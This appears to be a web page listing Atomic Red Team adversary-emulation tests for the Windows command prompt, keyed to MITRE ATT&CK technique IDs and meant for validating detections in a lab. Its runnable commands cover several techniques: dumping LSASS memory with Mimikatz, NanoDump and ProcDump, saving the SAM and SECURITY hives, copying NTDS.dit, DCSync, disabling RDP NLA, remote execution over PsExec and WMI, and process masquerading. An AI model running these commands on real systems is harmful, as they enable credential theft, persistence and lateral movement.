Home/Atomic Tests
Atomic Red Team

Test-plan builder

Find runnable Atomic Red Team test cases for what you want to validate
Pick a technique, platform, or executor - or search by name - and get the executable test cases. Copy a command, run it on the listed platform in a lab, and confirm your detections fire. Pairs with the Detection Blind Spots on each actor page: see a gap, grab the test that exercises it.
filter by technique id in the URL: /atomic?technique=T1059

Matching tests · command_prompt

400
T1003 command_prompt elevated windows Gsecdump
OS Credential Dumping
Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's followed by two 32 character hashes. If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. You will receive only error output if you do not run this test from an elevated context (run as administrator) If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
"#{gsecdump_exe}" -a
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using ProcDump
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using direct system calls and API unhooking
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
"#{dumpert_exe}"
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using NanoDump
LSASS Memory
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanondump.dmp file in the temp directory
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
T1003.001 command_prompt elevated windows Offline Credential Theft With Mimikatz
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
T1003.001 command_prompt elevated windows LSASS read with pypykatz
LSASS Memory
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
"#{venv_path}\Scripts\pypykatz" live lsa
T1003.001 command_prompt elevated windows Create Mini Dump of LSASS.exe using ProcDump
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory through Silent Process Exit
LSASS Memory
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger specific actions for a monitored process in one of two scenarios; either the process terminates itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API. The major advantage of this technique is that it does not cause lsass.exe to crash, and since WerFault.exe is used to create file dumps all the time (not just lsass.exe), this method provides the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process, from an attacker standpoint this is appealing as their illicit credential extraction will appear benign because from a defender’s viewpoint it’s within the realm of normal activity. Upon successful execution, you should find the dump file in directory of your choice or "%temp%\SilentProcessExit" by default.
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
T1003.002 command_prompt elevated windows Registry dump of SAM, creds, and secrets
Security Account Manager
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
T1003.002 command_prompt elevated windows Registry parse with pypykatz
Security Account Manager
Parses registry hives to obtain stored credentials. Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
"#{venv_path}\Scripts\pypykatz" live lsa
T1003.002 command_prompt elevated windows esentutl.exe SAM copy
Security Account Manager
Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
T1003.002 command_prompt windows dump volume shadow copy hives with certutil
Security Account Manager
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
T1003.002 command_prompt elevated windows Dumping of SAM, creds, and secrets(Reg Export)
Security Account Manager
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with vssadmin
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
vssadmin.exe create shadow /for=#{drive_letter}
T1003.003 command_prompt elevated windows Copy NTDS.dit from Volume Shadow Copy
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller.
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
T1003.003 command_prompt elevated windows Dump Active Directory Database with NTDSUtil
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with WMI
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
wmic shadowcopy call create Volume=#{drive_letter}
T1003.003 command_prompt elevated windows Create Volume Shadow Copy remotely with WMI
NTDS
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
T1003.003 command_prompt elevated windows Create Volume Shadow Copy remotely (WMI) with esentutl
NTDS
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
T1003.003 command_prompt elevated windows Create Symlink to Volume Shadow Copy
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with diskshadow
NTDS
This test is intended to be run on a domain controller An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
mkdir c:\exfil
diskshadow.exe /s #{filename}
T1003.004 command_prompt elevated windows Dumping LSA Secrets
LSA Secrets
Dump secrets key from Windows registry When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
T1003.005 command_prompt windows Cached Credential Dump via Cmdkey
Cached Domain Credentials
List credentials currently stored on the host via the built-in Windows utility cmdkey.exe Credentials listed with Cmdkey only pertain to the current user Passwords will not be displayed once they are stored https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
cmdkey /list
T1003.006 command_prompt windows DCSync (Active Directory)
DCSync
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729)
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
T1007 command_prompt elevated windows System Service Discovery
System Service Discovery
Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
tasklist.exe /svc
sc query
sc query state= all
T1007 command_prompt windows System Service Discovery - net.exe
System Service Discovery
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in the temp directory called service-list.txt.
net.exe start >> #{output_file}
T1007 command_prompt windows Get-Service Execution
System Service Discovery
Executes the Get-Service cmdlet to gather objects representing all services on the local system.
powershell.exe Get-Service
T1007 command_prompt windows System Service Discovery - Windows Scheduled Tasks (schtasks)
System Service Discovery
Enumerates scheduled tasks on Windows using schtasks.exe.
schtasks /query /fo LIST /v
T1010 command_prompt windows List Process Main Windows - C# .NET
Application Window Discovery
Compiles and executes C# code to list main window titles associated with each process. Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
#{output_file_name}
T1012 command_prompt elevated windows Query Registry
Query Registry
Query Windows Registry. Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). References: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
T1012 command_prompt elevated windows Reg query for AlwaysInstallElevated status
Query Registry
The reg query commands allows to check the status of the AlwaysInstallElevated registry key for both the user and the machine. If both queries return a value of 0x1, then AlwaysInstallElevated is enabled for both user and machine thus allowing a regular user to install a Microsoft Windows Installer package with system level privileges. This can be abused by an attacker to escalate privileges in the host to SYSTEM level.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
T1012 command_prompt elevated windows Check Software Inventory Logging (SIL) status via Registry
Query Registry
Microsoft's Software Inventory Logging (SIL) collects information about software installed per host basis. Adversary can use such logs to passively check for existence of software of interest to them. Status of SIL can be checked via registry. [Reference](https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/)
reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64
T1012 command_prompt windows Inspect SystemStartOptions Value in Registry
Query Registry
The objective of this test is to query the SystemStartOptions key under HKLM\SYSTEM\CurrentControlSet\Control in the Windows registry. This action could be used to uncover specific details about how the system is configured to start, potentially aiding in understanding boot parameters or identifying security-related settings. key is.
reg.exe query HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions
T1016 command_prompt windows System Network Configuration Discovery on Windows
System Network Configuration Discovery
Identify network configuration information Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config
T1016 command_prompt windows List Windows Firewall Rules
System Network Configuration Discovery
Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
netsh advfirewall firewall show rule name=all
T1016 command_prompt windows System Network Configuration Discovery (TrickBot Style)
System Network Configuration Discovery
Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ Upon successful execution, cmd.exe will spawn ipconfig /all, net config workstation, net view /all /domain, nltest /domain_trusts. Output will be via stdout.
ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts
T1016 command_prompt windows Adfind - Enumerate Active Directory Subnet Objects
System Network Configuration Discovery
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}
T1016 command_prompt windows Qakbot Recon
System Network Configuration Discovery
A list of commands known to be performed by Qakbot for recon purposes
"#{recon_commands}"
T1016 command_prompt windows DNS Server Discovery Using nslookup
System Network Configuration Discovery
Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%
T1016.001 command_prompt windows Check internet connection using ping Windows
Internet Connection Discovery
Check internet connection using ping on Windows. The default target of the ping is 8.8.8.8 (Google Public DNS).
ping -n 4 #{ping_target}
T1016.002 command_prompt windows Enumerate Stored Wi-Fi Profiles And Passwords via netsh
Wi-Fi Discovery
Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
netsh wlan show profile * key=clear
T1018 command_prompt windows Remote System Discovery - net
Remote System Discovery
Identify remote systems with net.exe. Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled.
net view /domain
net view
T1018 command_prompt windows Remote System Discovery - net group Domain Computers
Remote System Discovery
Identify remote systems with net.exe querying the Active Directory Domain Computers group. Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
net group "Domain Computers" /domain
T1018 command_prompt windows Remote System Discovery - nltest
Remote System Discovery
Identify domain controllers for specified domain. Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
nltest.exe /dclist:#{target_domain}
T1018 command_prompt windows Remote System Discovery - ping sweep
Remote System Discovery
Identify remote systems via ping sweep. Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
T1018 command_prompt windows Remote System Discovery - arp
Remote System Discovery
Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
arp -a
T1018 command_prompt elevated windows Remote System Discovery - adidnsdump
Remote System Discovery
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will list dns zones in the terminal.
"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
T1018 command_prompt windows Adfind - Enumerate Active Directory Computer Objects
Remote System Discovery
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
T1018 command_prompt windows Adfind - Enumerate Active Directory Domain Controller Objects
Remote System Discovery
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
T1018 command_prompt windows Remote System Discovery - net group Domain Controller
Remote System Discovery
Identify remote systems with net.exe querying the Active Directory Domain Controller. Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Controller" in the domain. Output will be via stdout.
net group /domain "Domain controllers"
T1021.001 command_prompt elevated windows Changing RDP Port to Non Standard Port via Command_Prompt
Remote Desktop Protocol
Changing RDP Port to Non Standard Port via Command_Prompt
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
T1021.001 command_prompt windows Disable NLA for RDP via Command Prompt
Remote Desktop Protocol
Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt Disabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/ See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f
T1021.002 command_prompt windows Map admin share
SMB/Windows Admin Shares
Connecting To Remote Shares
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
T1021.002 command_prompt elevated windows Copy and Execute File with PsExec
SMB/Windows Admin Shares
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
T1021.002 command_prompt elevated windows Execute command writing output to local Admin Share
SMB/Windows Admin Shares
Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks.
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
T1021.004 command_prompt windows ESXi - Enable SSH via VIM-CMD
SSH
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1025 command_prompt windows Identify Documents on USB and Removable Media via PowerShell
Data from Removable Media
This test simulates an attack where PowerShell is used to detect connected USB or other removable storage devices and gather a list of specific document files (e.g., .docx, .xls, .txt, .pdf). The command works by first identifying removable drives on the system and then recursively searching through each one for files matching the targeted extensions. If no removable drives are present, the script will return a message stating that no media is detected. This behavior mimics how adversaries might scan for sensitive documents on removable devices for exfiltration or analysis.
powershell.exe -c "Get-Volume | Where-Object {$_.DriveType -eq 'Removable'} | ForEach-Object { Get-ChildItem -Path ($_.DriveLetter + ':\*') -Recurse -Include '*.doc*','*.xls*','*.txt','*.pdf' -ErrorAction SilentlyContinue | ForEach-Object {Write-Output $_.FullName} } ; if (-not (Get-Volume | Where-Object {$_.DriveType -eq 'Removable'})) { Write-Output 'No removable media.' }"
T1027 command_prompt windows Execution from Compressed File
Obfuscated Files or Information
Mimic execution of compressed executable. When successfully executed, calculator.exe will open.
"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"
T1027 command_prompt windows Execution from Compressed JScript File
Obfuscated Files or Information
Mimic execution of compressed JavaScript file. When successfully executed, calculator.exe will open. This test is meant to help emulate Gootloader as per https://redcanary.com/blog/gootloader/
"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"
T1027.004 command_prompt windows Compile After Delivery using csc.exe
Compile After Delivery
Compile C# code using csc.exe binary used by .NET Upon execution an exe named T1027.004.exe will be placed in the temp folder
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} "#{input_file}"
T1033 command_prompt windows System Owner/User Discovery
System Owner/User Discovery
Identify System owner or users on an endpoint. Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt.
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
T1033 command_prompt windows System Owner/User Discovery Using Command Prompt
System Owner/User Discovery
Identify the system owner or current user using native Windows command prompt utilities.
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
T1036.003 command_prompt windows Masquerading as Windows LSASS process
Rename Legitimate Utilities
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
T1036.003 command_prompt windows Masquerading - cscript.exe running as notepad.exe
Rename Legitimate Utilities
Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
T1036.003 command_prompt windows Masquerading - wscript.exe running as svchost.exe
Rename Legitimate Utilities
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe "PathToAtomicsFolder\..\ExternalPayloads\T1036.003\src\T1036.003_masquerading.vbs"
T1036.003 command_prompt windows Masquerading - powershell.exe running as taskhostw.exe
Rename Legitimate Utilities
Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
T1036.003 command_prompt elevated windows Malicious process Masquerading as LSM.exe
Rename Legitimate Utilities
Detect LSM running from an incorrect directory and an incorrect service account This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path.
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036.003 > C:\T1036.003.txt
T1036.004 command_prompt elevated windows Creating W32Time similar named service using schtasks
Masquerade Task or Service
Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao"
schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\T1036.004_NonExistingScript.ps1" /tn win32times /f
schtasks /query /tn win32times
T1036.004 command_prompt elevated windows Creating W32Time similar named service using sc
Masquerade Task or Service
Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao"
sc create win32times binPath= "cmd /c start c:\T1036.004_NonExistingScript.ps1"
sc qc win32times
T1036.007 command_prompt windows File Extension Masquerading
Double File Extension
download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)
copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.pdf.exe /Y
copy "#{exe_path}" %temp%\T1036.007_masquerading.ps1.exe /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xls.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.xlsx.vbs /Y
copy "#{vbs_path}" %temp%\T1036.007_masquerading.png.vbs /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.doc.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.pdf.ps1 /Y
copy "#{ps1_path}" %temp%\T1036.007_masquerading.rtf.ps1 /Y
%temp%\T1036.007_masquerading.docx.exe
%temp%\T1036.007_masquerading.pdf.exe
%temp%\T1036.007_masquerading.ps1.exe
%temp%\T1036.007_masquerading.xls.vbs
%temp%\T1036.007_masquerading.xlsx.vbs
%temp%\T1036.007_masquerading.png.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.doc.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.pdf.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File %temp%\T1036.007_masquerading.rtf.ps1
T1037.001 command_prompt windows Logon Scripts
Logon Script (Windows)
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key that can be viewed in the Registry Editor.
echo "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
T1039 command_prompt elevated windows Copy a sensitive File over Administrative share with copy
Data from Network Shared Drive
Copy from sensitive File from the c$ of another LAN computer with copy cmd https://twitter.com/SBousseaden/status/1211636381086339073
copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}
T1040 command_prompt elevated windows Packet Capture Windows Command Prompt
Network Sniffing
Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed. Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
T1040 command_prompt elevated windows Windows Internal Packet Capture
Network Sniffing
Uses the built-in Windows packet capture After execution you should find a file named trace.etl and trace.cab in the temp directory
netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10
T1040 command_prompt elevated windows Windows Internal pktmon capture
Network Sniffing
Will start a packet capture and store log file as t1040.etl. https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
pktmon.exe start --etw  -f %TEMP%\t1040.etl
TIMEOUT /T 5 >nul 2>&1
